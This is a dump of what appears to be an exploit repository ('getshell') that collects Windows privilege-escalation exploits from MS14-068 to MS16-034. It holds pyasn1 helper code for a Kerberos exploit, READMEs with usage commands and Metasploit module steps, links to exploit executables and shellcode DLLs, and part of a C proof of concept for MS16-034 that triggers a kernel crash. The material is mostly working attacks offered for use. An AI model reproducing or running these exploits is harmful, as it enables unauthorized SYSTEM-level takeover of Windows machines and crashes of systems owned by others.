33 | self._printer('DBG: %s\n' % msg) 34 | 35 | def __and__(self, flag): 36 | return 
self._flags & flag 37 | 38 | def __rand__(self, flag): 39 | return flag & self._flags 40 | 41 | logger = 0 42 | 43 | def setLogger(l): 44 | global logger 45 | logger = l 46 | 47 | def hexdump(octets): 48 | return ' '.join( 49 | [ '%s%.2X' % (n%16 == 0 and ('\n%.5d: ' % n) or '', x) 50 | for n,x in zip(range(len(octets)), octs2ints(octets)) ] 51 | ) 52 | 53 | class Scope: 54 | def __init__(self): 55 | self._list = [] 56 | 57 | def __str__(self): return '.'.join(self._list) 58 | 59 | def push(self, token): 60 | self._list.append(token) 61 | 62 | def pop(self): 63 | return self._list.pop() 64 | 65 | scope = Scope() 66 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/error.py: -------------------------------------------------------------------------------- 1 | class PyAsn1Error(Exception): pass 2 | class ValueConstraintError(PyAsn1Error): pass 3 | class SubstrateUnderrunError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/__init__.py: -------------------------------------------------------------------------------- 1 | # This file is necessary to make this directory a package. 
2 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/char.py: -------------------------------------------------------------------------------- 1 | # ASN.1 "character string" types 2 | from pyasn1.type import univ, tag 3 | 4 | class UTF8String(univ.OctetString): 5 | tagSet = univ.OctetString.tagSet.tagImplicitly( 6 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12) 7 | ) 8 | encoding = "utf-8" 9 | 10 | class NumericString(univ.OctetString): 11 | tagSet = univ.OctetString.tagSet.tagImplicitly( 12 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18) 13 | ) 14 | 15 | class PrintableString(univ.OctetString): 16 | tagSet = univ.OctetString.tagSet.tagImplicitly( 17 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19) 18 | ) 19 | 20 | class TeletexString(univ.OctetString): 21 | tagSet = univ.OctetString.tagSet.tagImplicitly( 22 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20) 23 | ) 24 | 25 | 26 | class VideotexString(univ.OctetString): 27 | tagSet = univ.OctetString.tagSet.tagImplicitly( 28 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21) 29 | ) 30 | 31 | class IA5String(univ.OctetString): 32 | tagSet = univ.OctetString.tagSet.tagImplicitly( 33 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22) 34 | ) 35 | 36 | class GraphicString(univ.OctetString): 37 | tagSet = univ.OctetString.tagSet.tagImplicitly( 38 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25) 39 | ) 40 | 41 | class VisibleString(univ.OctetString): 42 | tagSet = univ.OctetString.tagSet.tagImplicitly( 43 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26) 44 | ) 45 | 46 | class GeneralString(univ.OctetString): 47 | tagSet = univ.OctetString.tagSet.tagImplicitly( 48 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27) 49 | ) 50 | 51 | class UniversalString(univ.OctetString): 52 | tagSet = univ.OctetString.tagSet.tagImplicitly( 53 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28) 54 | ) 
55 | encoding = "utf-32-be" 56 | 57 | class BMPString(univ.OctetString): 58 | tagSet = univ.OctetString.tagSet.tagImplicitly( 59 | tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30) 60 | ) 61 | encoding = "utf-16-be" 62 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/error.py: -------------------------------------------------------------------------------- 1 | from pyasn1.error import PyAsn1Error 2 | 3 | class ValueConstraintError(PyAsn1Error): pass 4 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/namedval.py: -------------------------------------------------------------------------------- 1 | # ASN.1 named integers 2 | from pyasn1 import error 3 | 4 | __all__ = [ 'NamedValues' ] 5 | 6 | class NamedValues: 7 | def __init__(self, *namedValues): 8 | self.nameToValIdx = {}; self.valToNameIdx = {} 9 | self.namedValues = () 10 | automaticVal = 1 11 | for namedValue in namedValues: 12 | if isinstance(namedValue, tuple): 13 | name, val = namedValue 14 | else: 15 | name = namedValue 16 | val = automaticVal 17 | if name in self.nameToValIdx: 18 | raise error.PyAsn1Error('Duplicate name %s' % (name,)) 19 | self.nameToValIdx[name] = val 20 | if val in self.valToNameIdx: 21 | raise error.PyAsn1Error('Duplicate value %s=%s' % (name, val)) 22 | self.valToNameIdx[val] = name 23 | self.namedValues = self.namedValues + ((name, val),) 24 | automaticVal = automaticVal + 1 25 | def __str__(self): return str(self.namedValues) 26 | 27 | def getName(self, value): 28 | if value in self.valToNameIdx: 29 | return self.valToNameIdx[value] 30 | 31 | def getValue(self, name): 32 | if name in self.nameToValIdx: 33 | return self.nameToValIdx[name] 34 | 35 | def __getitem__(self, i): return self.namedValues[i] 36 | def __len__(self): return len(self.namedValues) 37 | 38 | def __add__(self, namedValues): 39 | return self.__class__(*self.namedValues + namedValues) 40 | 
def __radd__(self, namedValues): 41 | return self.__class__(*namedValues + tuple(self)) 42 | 43 | def clone(self, *namedValues): 44 | return self.__class__(*tuple(self) + namedValues) 45 | 46 | # XXX clone/subtype? 47 | -------------------------------------------------------------------------------- /MS14-068/pykek/pyasn1/type/tagmap.py: -------------------------------------------------------------------------------- 1 | from pyasn1 import error 2 | 3 | class TagMap: 4 | def __init__(self, posMap={}, negMap={}, defType=None): 5 | self.__posMap = posMap.copy() 6 | self.__negMap = negMap.copy() 7 | self.__defType = defType 8 | 9 | def __contains__(self, tagSet): 10 | return tagSet in self.__posMap or \ 11 | self.__defType is not None and tagSet not in self.__negMap 12 | 13 | def __getitem__(self, tagSet): 14 | if tagSet in self.__posMap: 15 | return self.__posMap[tagSet] 16 | elif tagSet in self.__negMap: 17 | raise error.PyAsn1Error('Key in negative map') 18 | elif self.__defType is not None: 19 | return self.__defType 20 | else: 21 | raise KeyError() 22 | 23 | def __repr__(self): 24 | s = '%r/%r' % (self.__posMap, self.__negMap) 25 | if self.__defType is not None: 26 | s = s + '/%r' % (self.__defType,) 27 | return s 28 | 29 | def clone(self, parentType, tagMap, uniq=False): 30 | if self.__defType is not None and tagMap.getDef() is not None: 31 | raise error.PyAsn1Error('Duplicate default value at %s' % (self,)) 32 | if tagMap.getDef() is not None: 33 | defType = tagMap.getDef() 34 | else: 35 | defType = self.__defType 36 | 37 | posMap = self.__posMap.copy() 38 | for k in tagMap.getPosMap(): 39 | if uniq and k in posMap: 40 | raise error.PyAsn1Error('Duplicate positive key %s' % (k,)) 41 | posMap[k] = parentType 42 | 43 | negMap = self.__negMap.copy() 44 | negMap.update(tagMap.getNegMap()) 45 | 46 | return self.__class__( 47 | posMap, negMap, defType, 48 | ) 49 | 50 | def getPosMap(self): return self.__posMap.copy() 51 | def getNegMap(self): return 
self.__negMap.copy() 52 | def getDef(self): return self.__defType 53 |
--------------------------------------------------------------------------------
/MS14-068/pykek/pyasn1/type/useful.py:
--------------------------------------------------------------------------------
# ASN.1 "useful" types
from pyasn1.type import char, tag

class GeneralizedTime(char.VisibleString):
    tagSet = char.VisibleString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 24)
    )

class UTCTime(char.VisibleString):
    tagSet = char.VisibleString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 23)
    )
--------------------------------------------------------------------------------
/MS14-070/MS14-070.rar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070.rar
--------------------------------------------------------------------------------
/MS14-070/MS14-070/35936.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070/35936.exe
--------------------------------------------------------------------------------
/MS14-070/MS14-070/37755.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/MS14-070/37755.exe
--------------------------------------------------------------------------------
/MS14-070/README.md:
--------------------------------------------------------------------------------
# MS14-070

- The exploit is taken from [@dev-zzo](https://github.com/dev-zzo/exploits-nt-privesc/blob/master/MS14-070/MS14-070.c)

Vulnerability reference:
* [MS14-070](https://technet.microsoft.com/library/security/ms14-070)
* [CVE-2014-4076](https://www.exploit-db.com/exploits/37755/)

## Usage
```
c:\> MS14-070.exe
```

![win2003](win2003.png)

## Links

- [Microsoft Windows Server 2003 SP2 (CVE-2014-4076)](https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt)
--------------------------------------------------------------------------------
/MS14-070/win2003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS14-070/win2003.png
--------------------------------------------------------------------------------
/MS15-001/AppCompatCache.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/AppCompatCache.exe
--------------------------------------------------------------------------------
/MS15-001/README.md:
--------------------------------------------------------------------------------
# MS15-001

Vulnerability reference:
* [MS15-001](https://technet.microsoft.com/library/security/ms15-001)
* [CVE-2015-0002](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0002)

## References
* [Project Zero](http://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html)
* [A Token's Tale (CVE-2015-0002) (Chinese) - cssembly](http://www.vuln.cn/6702)
--------------------------------------------------------------------------------
/MS15-001/TestDLL.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/TestDLL.dll
--------------------------------------------------------------------------------
/MS15-001/source.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-001/source.zip
--------------------------------------------------------------------------------
/MS15-010/39035.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-010/39035.exe
--------------------------------------------------------------------------------
/MS15-010/CVE-2015-0057.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-010/CVE-2015-0057.zip
--------------------------------------------------------------------------------
/MS15-010/README.md:
--------------------------------------------------------------------------------
# MS15-010

- The PoC is taken from [@Offensive Security](https://github.com/offensive-security/exploit-database-bin-sploits/tree/master/sploits)

Vulnerability reference:
* [MS15-010](https://technet.microsoft.com/en-us/library/security/ms15-010.aspx)
* [CVE-2015-0003](https://www.exploit-db.com/exploits/37098/)

### Links

* [Dyre Banking Trojan Exploits CVE-2015-0057](https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html)
* [Windows 8 Heap Internals](http://illmatics.com/Windows%208%20Heap%20Internals.pdf)
* [Kernel Attacks through User-Mode Callbacks](https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf)
--------------------------------------------------------------------------------
/MS15-015/README.md:
--------------------------------------------------------------------------------
# MS15-015

```
An elevation of privilege vulnerability exists in Microsoft Windows when it fails to properly validate and enforce impersonation levels.
An attacker who successfully exploited this vulnerability could bypass impersonation-level security checks and gain elevated privileges on a targeted system.
This vulnerability can be exploited only in the specific scenario where the process uses SeAssignPrimaryTokenPrivilege, which is not available for normal processes.
```

Vulnerability reference:
* [MS15-015](https://technet.microsoft.com/zh-cn/library/security/ms15-015.aspx)
* [CVE-2015-0062](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0062)

## Usage
```
c:\> MS15-015.exe "whoami"
```

## Thanks
Thanks to **@浮萍** for helping to complete this entry.
--------------------------------------------------------------------------------
/MS15-015/ms15-015.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-015/ms15-015.zip
--------------------------------------------------------------------------------
/MS15-051/2008.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/2008.png
--------------------------------------------------------------------------------
/MS15-051/37049-32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/37049-32.exe
--------------------------------------------------------------------------------
/MS15-051/Compiled/Taihou32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/Compiled/Taihou32.exe
--------------------------------------------------------------------------------
/MS15-051/Compiled/Taihou64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/Compiled/Taihou64.exe
--------------------------------------------------------------------------------
/MS15-051/MS15-051-KB3045171.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/MS15-051-KB3045171.zip
--------------------------------------------------------------------------------
/MS15-051/README.md:
--------------------------------------------------------------------------------
# MS15-051

- The PoC is taken from [@hfiref0x](https://github.com/hfiref0x/CVE-2015-1701)

Vulnerability reference:
* [MS15-051](https://technet.microsoft.com/en-us/library/security/ms15-051.aspx)
* [CVE-2015-1701](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe)

## Usage
```
c:\> MS15-051.exe whoami
```
![win7](win7.png)
![2008](2008.png)

## Loading the module in the Metasploit console
```
msf > use exploit/windows/local/ms15_051_client_copy_image
msf exploit(ms15_051_client_copy_image) > show targets
...targets...
msf exploit(ms15_051_client_copy_image) > set TARGET <target-id>
msf exploit(ms15_051_client_copy_image) > show options
...show and set options...
msf exploit(ms15_051_client_copy_image) > exploit
```

### Links

* [Win32k Elevation of Privilege Vulnerability](https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html)
--------------------------------------------------------------------------------
/MS15-051/ms15-051.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/ms15-051.zip
--------------------------------------------------------------------------------
/MS15-051/win7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-051/win7.png
--------------------------------------------------------------------------------
/MS15-061/README.md:
--------------------------------------------------------------------------------
# MS15-061

- Exploiting MS15-061 with reverse engineering Win32k.sys by
- The exploit is taken from [@Rootkitsmm](https://github.com/Rootkitsmm/MS15-061)

Vulnerability reference:
* [MS15-061](https://technet.microsoft.com/en-us/library/security/ms15-061.aspx)
* [CVE-2015-1726](https://www.exploit-db.com/exploits/38269/)

### Links

* [Exploiting the MS15-061 Windows kernel use-after-free vulnerability (Chinese translation)](https://github.com/LibreCrops/translation-zh_CN/blob/master/source/ms-15-061.rst)
--------------------------------------------------------------------------------
/MS15-076/Binary/Microsoft.VisualStudio.OLE.Interop.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/Binary/Microsoft.VisualStudio.OLE.Interop.dll
--------------------------------------------------------------------------------
/MS15-076/Binary/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/Binary/Trebuchet.exe -------------------------------------------------------------------------------- /MS15-076/README.md: -------------------------------------------------------------------------------- 1 | # MS15-076 2 | 3 | - We can Copies a file to any privileged location on disk 4 | 5 | - The POC was from [@monoxgas](https://github.com/monoxgas/Trebuchet) 6 | 7 | 8 | Vulnerability reference: 9 | * [MS15-076](https://technet.microsoft.com/en-us/library/security/ms15-076.aspx) 10 | * [CVE-2015-2370](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2370) 11 | 12 | 13 | ### notes 14 | - Exploit can only be one once every 2-3 minutes. This is because RPC can be held up by LocalSystem 15 | - The destination file can't already exist 16 | - Tested on x64/x86 Windows 7/8.1 17 | - Microsoft.VisualStudio.OLE.Inerop.dll must be in the same directory 18 | 19 | ### Usage 20 | 21 | c:\> trebuchet.exe C:\Users\Bob\Evil.txt C:\Windows\System32\Evil.dll 22 | 23 | 24 | ### Links 25 | 26 | * [lightly modified Proof of Concept by James Forshaw with Google]( https://code.google.com/p/google-security-research/issues/detail?id=325) 27 | 28 | 29 | -------------------------------------------------------------------------------- /MS15-076/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-076/source.zip -------------------------------------------------------------------------------- /MS15-077/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/2003.png 
-------------------------------------------------------------------------------- /MS15-077/HTFontExp.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/HTFontExp.rar -------------------------------------------------------------------------------- /MS15-077/MS15-077-KB3077657.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/MS15-077-KB3077657.zip -------------------------------------------------------------------------------- /MS15-077/README.md: -------------------------------------------------------------------------------- 1 | # MS15-077 2 | 3 | ``` 4 | An elevation of privilege vulnerability exists in Adobe Type Manager Font Driver (ATMFD) when it fails to properly handle objects in memory. 5 | An attacker who successfully exploited this vulnerability could execute arbitrary code and take complete control of an affected system. 6 | An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
7 | ``` 8 | 9 | Vulnerability reference: 10 | * [MS15-077](https://technet.microsoft.com/zh-cn/library/security/MS15-077) 11 | * [CVE-2015-2387](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2387) 12 | * [exp-db](https://www.exploit-db.com/exploits/37098/) 13 | 14 | ## Usage 15 | ``` 16 | c:\> elevator.exe whoami 17 | ``` 18 | ![2003](2003.png) 19 | ![win7](win7.jpg) 20 | ![win7-x64](win7-x64.png) 21 | 22 | ## References 23 | - [Exploiting_CVE_2015_2426_-_Release](https://www.google.com.hk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&cad=rja&uact=8&ved=0ahUKEwjwupmJxrDUAhUG5mMKHcZpBw8QFghkMAk&url=https%3A%2F%2Fwww.nccgroup.trust%2Fglobalassets%2Four-research%2Fuk%2Fwhitepapers%2F2015%2F09%2F2015-08-28_-_ncc_group_-_exploiting_cve_2015_2426_-_release.pdf&usg=AFQjCNGE4OcY0-mI_8hcki768ZMYmsXTtQ) 24 | -------------------------------------------------------------------------------- /MS15-077/elevator.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/elevator.exe -------------------------------------------------------------------------------- /MS15-077/exp/WindowsServer2003-KB3077657-x64-ENU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/exp/WindowsServer2003-KB3077657-x64-ENU.exe -------------------------------------------------------------------------------- /MS15-077/exp/WindowsServer2003-KB3077657-x86-ENU.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/exp/WindowsServer2003-KB3077657-x86-ENU.exe -------------------------------------------------------------------------------- /MS15-077/win7-x64.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/win7-x64.png -------------------------------------------------------------------------------- /MS15-077/win7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-077/win7.jpg -------------------------------------------------------------------------------- /MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/38198/Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe -------------------------------------------------------------------------------- /MS15-097/38198/injected.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/38198/injected.dll -------------------------------------------------------------------------------- /MS15-097/MS15-097-KB3079904-CVE-2015-2527.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/MS15-097-KB3079904-CVE-2015-2527.zip -------------------------------------------------------------------------------- /MS15-097/README.md: -------------------------------------------------------------------------------- 1 | # MS15-097 2 | 3 | MS15-097 4 | 5 | Vulnerability reference: 6 | * [MS15-097](https://technet.microsoft.com/library/security/ms15-097) 7 | * [CVE-2015-2517](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2517) 8 | 9 | 10 | 
[CVE-2015-2546-Exploit](https://github.com/k0keoyo/CVE-2015-2546-Exploit) -------------------------------------------------------------------------------- /MS15-097/exp/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2015-2546-Exploit 2 | 3 | My paper about CVE-2015-2546: http://bobao.360.cn/learning/detail/3184.html 4 | 5 | My blog:http://whereisk0shl.top 6 | -------------------------------------------------------------------------------- /MS15-097/exp/_CVE_2015_2546_exp.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS15-097/exp/_CVE_2015_2546_exp.cpp -------------------------------------------------------------------------------- /MS16-014/ms16-014.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-014/ms16-014.rar -------------------------------------------------------------------------------- /MS16-016/39788/EoP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/39788/EoP.exe -------------------------------------------------------------------------------- /MS16-016/39788/Shellcode.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/39788/Shellcode.dll -------------------------------------------------------------------------------- /MS16-016/BSoD.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/BSoD.exe 
-------------------------------------------------------------------------------- /MS16-016/EoP.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/EoP.zip -------------------------------------------------------------------------------- /MS16-016/EoP_variant.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/EoP_variant.zip -------------------------------------------------------------------------------- /MS16-016/README.md: -------------------------------------------------------------------------------- 1 | # MS16-016 2 | 3 | - The POC of MS16-016 was from [@Tamás Koczka](https://github.com/koczkatamas/CVE-2016-0051) 4 | - A variant of this PoC [3hexx0r](https://github.com/hexx0r/CVE-2016-0051) 5 | 6 | 7 | Vulnerability reference: 8 | * [MS16-016](https://technet.microsoft.com/en-us/library/security/ms16-016.aspx) 9 | * [CVE-2016-0051](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0051) 10 | 11 | ### EoP to SYSTEM on Windows 7 SP1 x86 12 | 13 | ![Elevation of Privilege on Windows 7 x86 before the patch](eop_win7x86.gif) 14 | 15 | ### BSoD on a Windows 10 x64 16 | 17 | ![Crash on a Windows 10 x64 before the patch](bsod_win10x64.gif) 18 | 19 | ### msf 20 | ``` 21 | msf > use exploit/windows/local/ms16_016_webdav 22 | ``` 23 | 24 | ### Links 25 | 26 | * [Microsoft Security Bulletin MS16-016](https://technet.microsoft.com/en-us/library/security/ms16-016.aspx) 27 | * [Microsoft Acknowledgements page](https://technet.microsoft.com/library/security/mt674627.aspx) 28 | 29 | You can find both exploits on Exploit-db 30 | 1) koczkatamas 31 | https://www.exploit-db.com/exploits/39432/ 32 | 33 | 2) hex0r 34 | https://www.exploit-db.com/exploits/39788/ 35 | 36 | 
-------------------------------------------------------------------------------- /MS16-016/bsod_win10x64.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/bsod_win10x64.gif -------------------------------------------------------------------------------- /MS16-016/eop_win7x86.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-016/eop_win7x86.gif -------------------------------------------------------------------------------- /MS16-032/README.md: -------------------------------------------------------------------------------- 1 | # MS16-032 2 | 3 | - The POC of MS16-032 was from [exp-db](https://www.exploit-db.com/exploits/39719/) 4 | - The exp(ms16-032.exe) was from [@khr0x40sh](https://github.com/khr0x40sh/ms16-032) 5 | 6 | Vulnerability reference: 7 | * [MS16-135](https://technet.microsoft.com/en-us/library/security/ms16-032.aspx) 8 | * [CVE-2016-0099](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0099) 9 | 10 | ## Targets 11 | - Windows x86 12 | - Windows x64 13 | 14 | ### Usage of MS16-032.ps1 15 | 16 | ![x86](img/x86.png) 17 | 18 | ![x64](img/x64.png) 19 | 20 | ### Windows 10 21 | 22 | ![Win10](img/win10.png) 23 | 24 | *** 25 | 26 | ## Use on msf 27 | 28 | This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores. 29 | 30 | ``` 31 | msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 32 | msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets 33 | ...targets... 
34 | msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET 35 | msf exploit(ms16_032_secondary_logon_handle_privesc) > show options 36 | ...show and set options... 37 | msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit 38 | ``` 39 | -------------------------------------------------------------------------------- /MS16-032/img/win10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/win10.png -------------------------------------------------------------------------------- /MS16-032/img/x64.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/x64.png -------------------------------------------------------------------------------- /MS16-032/img/x86.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/img/x86.png -------------------------------------------------------------------------------- /MS16-032/x64/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/x64/ms16-032.exe -------------------------------------------------------------------------------- /MS16-032/x86/ms16-032.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS16-032/x86/ms16-032.exe -------------------------------------------------------------------------------- /MS16-034/FillRgn_BSoD.cpp: -------------------------------------------------------------------------------- 1 | /** 2 | * Author: bee13oy of CloverSec 
Labs 3 | * BSoD on Windows 7 SP1 x86 / Windows 10 x86 4 | * EoP to SYSTEM on Windows 7 SP1 x86 5 | **/ 6 | 7 | #include 8 | 9 | #pragma comment(lib, "gdi32.lib") 10 | #pragma comment(lib, "user32.lib") 11 | 12 | unsigned int demo_CreateBitmapIndirect(void) { 13 | static BITMAP bitmap = { 0, 8, 8, 2, 1, 1 }; 14 | static BYTE bits[8][2] = { 0xFF, 0, 0x0C, 0, 0x0C, 0, 0x0C, 0, 15 | 0xFF, 0, 0xC0, 0, 0xC0, 0, 0xC0, 0 }; 16 | 17 | bitmap.bmBits = bits; 18 | 19 | SetLastError(NO_ERROR); 20 | 21 | HBITMAP hBitmap = CreateBitmapIndirect(&bitmap); 22 | 23 | return (unsigned int)hBitmap; 24 | } 25 | 26 | #define eSyscall_NtGdiSetBitmapAttributes 0x1110 27 | 28 | W32KAPI HBITMAP NTAPI NtGdiSetBitmapAttributes( 29 | HBITMAP argv0, 30 | DWORD argv1 31 | ) 32 | { 33 | __asm 34 | { 35 | push argv1; 36 | push argv0; 37 | push 0x00; 38 | mov eax, eSyscall_NtGdiSetBitmapAttributes; 39 | mov edx, addr_kifastsystemcall; 40 | call edx; 41 | add esp, 0x0c; 42 | } 43 | } 44 | 45 | void Trigger_BSoDPoc() { 46 | HBITMAP hBitmap1 = (HBITMAP)demo_CreateBitmapIndirect(); 47 | HBITMAP hBitmap2 = (HBITMAP)NtGdiSetBitmapAttributes((HBITMAP)hBitmap1, (DWORD)0x8f9); 48 | 49 | RECT rect = { 0 }; 50 | rect.left = 0x368c; 51 | rect.top = 0x400000; 52 | HRGN hRgn = (HRGN)CreateRectRgnIndirect(&rect); 53 | 54 | HDC hdc = (HDC)CreateCompatibleDC((HDC)0x0); 55 | SelectObject((HDC)hdc, (HGDIOBJ)hBitmap2); 